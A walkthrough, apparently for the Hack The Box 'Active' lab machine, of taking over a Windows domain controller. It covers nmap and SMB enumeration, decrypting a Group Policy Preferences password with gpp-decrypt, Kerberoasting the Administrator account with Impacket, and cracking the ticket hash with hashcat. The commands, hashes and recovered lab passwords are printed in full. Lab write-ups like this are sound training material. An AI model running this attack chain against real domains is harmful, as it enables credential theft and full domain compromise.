Active

The techniques used on this system are explained in these posts:

Group Policy Preferences

Kerberoasting

 

Initial Nmap

sudo nmap -sS -sV -p- -T4 --disable-arp-ping -Pn -n -v 10.10.10.100

PORT STATE SERVICE VERSION 
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1) 
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-10-12 08:21:03Z) 
135/tcp open msrpc Microsoft Windows RPC 
139/tcp open netbios-ssn Microsoft Windows netbios-ssn 
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open tcpwrapped
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5722/tcp open msrpc Microsoft Windows RPC
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49169/tcp open msrpc Microsoft Windows RPC
49171/tcp open msrpc Microsoft Windows RPC
49180/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Check for easy wins with eternal blue exploit. No luck. Quick enumeration with SMBClient:

smbclient -L \\\\10.10.10.100\\

Enter WORKGROUP\sweps's password:
Anonymous login successful

Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Replication Disk
SYSVOL Disk Logon server share
Users Disk

Enumerating further finds the Groups.xml file.

smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\> dir
  .                                   D        0  Sat Jul 21 06:37:44 2018
  ..                                  D        0  Sat Jul 21 06:37:44 2018
  Groups.xml                          A      533  Wed Jul 18 16:46:06 2018

 

Decrypting the cPassword with gpp-decrypt:

gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18

Now we have a password for the Ticket Granting Service account and from the port scan confirm this is a Domain Controller running Kerberos we can Kerberoast the the account and try get a hash for a user account:

88/tcp open kerberos-sec Microsoft Windows Kerberos
3268/tcp open ldap Microsoft Windows Active Directory LDAP

 

GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation

ServicePrincipalName Name MemberOf PasswordLastSet LastLogon
-------------------- ------------- -------------------------------------------------------- ------------------- -------------------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 15:06:40 2021-01-21 11:07:03

 

$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$08fdad61eba9ad9e1fa35ebb2afa9693$2f013ce555f555eb98d101379981799461b9dca72aaac3e690549eda475a76f6d0ead98d7844ea223e89246fe0e38794
5e7c093bef55b4b678d29e44921bb53d88528278e32103cef7979076d9cd2e34963cafd351020a5e079361cabc6fc554b9ea17fd5ca782414147c81a20c3bf54fe8e74b9a0be3e46b80fc13c7a723500654387e0422072bb95589f30
3e06a7df5e4d6466b4d1e293f4a8eb02fc7995a2b7fdb1701049ae9affcaf21ac0fa5944bc041857e37e088ffd25d5e4a7d024d9e1d2e99af4c3ad3ab2dd092f1061740f34bf1029b380c748bf223eaaaeb183644f77b182555ee8c6
c0edc912c71b47da654ae8a6d5691e9746514abf36897c1fd689a0d09845ffd9b7af7c40ec1a9e7b6155c7cfe64fe248e97cf1a0807ab94e5b13e6b2b547b608d22b48eb652fb997ecce816b7500836027f5b4737e86729c648d54c3
7c13effb75bf2463986b4ccabf190a2c4afd7388f60ff1d38db96cc6ffab05ef04c23454e8477421c8cd3666a756926a40c4708f0f7694ec12cdcc9bf6e83fa701aaa0abba48401735bea1c4da549d9f33eb2e1bf9cb9584e5435516
983783b3c18229f8241bf72e6e4ebf6f1d264a29088a9c15462a32657b7093b1181dad762b193f6576ccda01236e0fdb081fca15e48f34abec51b346b1d60a00b5e34cf06eed00c689c16745dd432c2dc2ec9415f29cdc4decbe6f0e
c00df0c75d40342f1e8eecda049598d41ec891e4a218d2f13c2292fc6a1ae6ed803c908bb0dc4bd7407d96f5eee49aa586e2ead4eb900f93718952c36eac67997b9abb27c0032b786e5243ff0fcf58dda4248ef29659f794e07b9bbb
bd8cb0ede59d8f42596a22ca0b0acb62ccdb560581241f57bcf1fbb2a200df8a101796dd7be0cc52fd985a42c687f8cd4080f35ca8ca1c7e5459f706332a4c188279fa779861402d89eba1412803ab00fd2036caa16c9395bc5b7d15
e7ff83a8066a384c0a22eccb9f07b87de10bde835f1835fff24ce359f2fbd3ce95a708e720c9eee4bde9ebca6a92453eedab3e0c4e13c652d5f9ddfa571afd6b91ff5c942a9e9d4b43876f2ac20080fffe523f77b1d1781f2ac450de
30a0e9b9f985f921cb2eb0bca38399c5868f307c0f3c6aadb50cc2f5c2c53649e62634f789428de1af7bfd59c991146b07ee42d0323268a121f85aa95668f09348d90bc04238b84fd04b6e9ae491e3e44780ad18c4ae10cabd97c8ca
ae274dbb7ed0c85390e06ba25657

Cracking the hash with Hashcat

hashcat -m 13100 hash /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt -O

$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$5906fe1889dfe728a15b37af68676886$a4c5ba6c34c37ae939d0b057434608612c9228ca4f3e064afe707234baad9622cfbdd31854226d2b90b5d80db48d361
fb4f4c8df67576c8176bc44380aad1c612d189c5982d61d308c80c26474d64149f6f22a5d41f070ced6dfe7ec2d6a0129afd13ab9143d3a1164fa2a4d90eed1c90ce8f35991ab8e1727f6e46fc69a36631c069b1c747399977b4a14
d4767e6e5fcc8a0c3f48c2a246a9a52d711a7b5cd1018aa3674339681db578056c020477458dcce506da3681a723ad2b683ec9c245c3c192caa751a0d13db769b5a4890453e1244c1c8eb48acf868ed030f5385c323693de1b02ce3
ec9e969c8491bbc0f0e1177884475662432671e8b3cfe5051cafb4849708b029e148d7481cfa4691116445538cfda21c957309f937182d28440e7d81d2454d21484724cef098d9d4caa05f1f24e02e08b1d133053f3591456a91200
db68e814c1ee5209c63099ad69a59c8cc4e028e1daa7c8b16373b68759ca6d65938f1ee9449bd9db3f2bf22a6c521b215c3cfb535df0c402829e3ff7fc0d75ca12851ba5303b4ea8a562e38c47ee4f3f2ecd6e12df4f220c5511f7f
4a9db4258ea17ef29dacd666de25070aaffe9fd9ff94fc7ce5dd8634d32da41d8a8258888c53c48862660a75082968700cfea9c9668a99e40bc1e7bb636dcb99e15caae02d09d5c2db92cf14472bc1be4d20981bbadec67047e5ba8
ef947cefae63f75955b4060c859c2ef467435f87af589b722211a65915b28c1299647441d2b588f042c5e3f58724ce122fffaca1114c01f0b5c5a3bbdeda0ade66f7e8a30caca03d60342b7c6e5484cc73928ca01613f24a17231d9
1d3f80f11e0ed5f8b480521276bc3cfaf048eea1daeb0f6c50bfaa1820458fd9556a89ad45f50a79cc2010b78b28fe8aed9268ef06980ed76166f4020493770b700cdcb03f102e27727e047e480525a3104c75dc0cac587a98164c9
33d3c3807abdea1ce423e141e9a25b6a1fe49f947e4866d54caa9d86d524f119a337dcd8dab4529aaca009e3bc806c609490afd99d302138c575b2567434d62e4869d27e3fa3045da92f7c7444b3da8c1ea220b84f7c75024df583f
582bd40462707721accabb46f0366c6918aaf52ebfe3cdbeff5c4b3cebac6bf381e577faf03fb308e501ea8b5430d2c39bf60577427deba8e4339208231b032178a1f21bf726e4ae5afc01059ae3d93a8a449aedb2a38ccc8c46214
bc1b7883ab38fbed3720385c9ae9e6759a8d43:Ticketmaster1968

Logging in via psexec and confirming we are system on the Domain Controller: